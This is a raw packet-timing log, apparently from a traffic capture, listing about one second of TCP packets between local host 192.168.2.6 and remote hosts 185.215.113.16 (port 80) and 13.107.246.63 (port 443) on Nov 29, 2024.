                                                                                                                                                                                    Nov 29, 2024 19:49:34.824361086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.824521065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.824568033 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.832061052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.832180023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.832223892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.839721918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.839905024 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.839950085 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.847425938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.847596884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.847646952 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.855145931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.855349064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.855398893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.861213923 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.861393929 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.861439943 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.867011070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.867137909 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.867183924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.872874975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.872978926 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.873029947 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.878732920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.878823996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.878878117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.884427071 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.884495974 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.884550095 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.917377949 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.917433977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.917526960 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.920293093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.920356989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.920407057 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.926089048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.926275969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.926332951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.931929111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.932032108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.932111025 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.938982964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.939057112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.939110041 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.943567038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.943696022 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.943782091 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.949413061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.949476004 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.949527979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.955162048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.955281973 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.955346107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.960958958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.961066008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.961127043 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.966849089 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.967071056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.967123032 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.972671986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.972743034 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.972803116 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.978466988 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.978545904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.978615999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.984296083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.984554052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.984608889 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.990046024 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.990165949 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.990217924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.994476080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.994574070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.994616985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.998675108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.998728037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.998794079 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.002810001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.002866030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.002919912 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.006736994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.006865025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.006912947 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.010785103 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.010948896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.011008024 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.014499903 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.014591932 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.014641047 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.018157959 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.018269062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.018352985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.021852970 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.021934032 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.021989107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.025497913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.025705099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.025764942 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.029288054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.029443979 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.029516935 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.032898903 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.033034086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.033083916 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036587954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036606073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036608934 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036680937 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036681890 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036726952 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036942005 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036955118 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036963940 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.036971092 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.040304899 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.040425062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.040474892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.043953896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.044059038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.044137955 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.047583103 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.047755003 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.047800064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.052356958 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.052412033 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.052478075 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.056828022 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.056840897 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.118578911 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.118757010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.118813038 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.119755030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.120214939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.120258093 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.120332003 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.122692108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.122737885 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.122801065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.125178099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.125228882 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.125241041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.127504110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.127548933 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.127579927 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.129981041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.130031109 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.130105019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.132477045 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.132519007 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.132594109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.134752035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.134799004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.134850025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.137090921 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.137135983 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.137231112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.139369011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.139421940 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.139441967 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.141648054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.141716957 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.141742945 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.143898964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.143944979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.144009113 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.146152020 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.146198988 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.146218061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.148437977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.148487091 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.148514986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.150561094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.150608063 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.150700092 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.152710915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.152757883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.152837038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.154923916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.154968977 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.155034065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.156976938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.157021999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.157073021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.159127951 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.159173012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.159265995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.161186934 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.161227942 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.161262989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.163244963 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.163290024 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.163294077 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.165282011 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.165328979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.165388107 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.167306900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.167351961 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.167361021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.169331074 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.169378042 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.169405937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.171319008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.171364069 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.171504021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.173319101 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.173363924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.173398018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.174941063 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.174990892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.175019026 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.176585913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.176639080 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.176646948 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.178302050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.178342104 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.178350925 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.179909945 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.179970980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.180002928 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.181610107 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.181668997 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.181756020 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.183232069 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.183301926 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.183336973 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.184847116 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.184902906 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.184963942 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.184972048 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.186490059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.186543941 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.186717033 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.188097000 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.188148022 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.188209057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.189794064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.189857006 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.189991951 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.191464901 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.191512108 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.191564083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.193109989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.193155050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.193166018 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.194706917 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.194756985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.194803953 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.196455002 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.196497917 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.196505070 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.198075056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.198126078 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.198266983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.199672937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.199732065 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.199795008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.201313972 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.201368093 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.201428890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.203030109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.203090906 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.203110933 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.204619884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.204679012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.204751015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.206330061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.206382990 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.206418037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.207973957 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.208030939 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.208053112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.209580898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.209640026 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.209670067 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.211282015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.211352110 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.211385965 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.212941885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.212990999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.213042021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.214576960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.214617968 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.214806080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.216239929 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.216290951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.216399908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.218048096 CET8049755185.215.113.16192.168.2.6
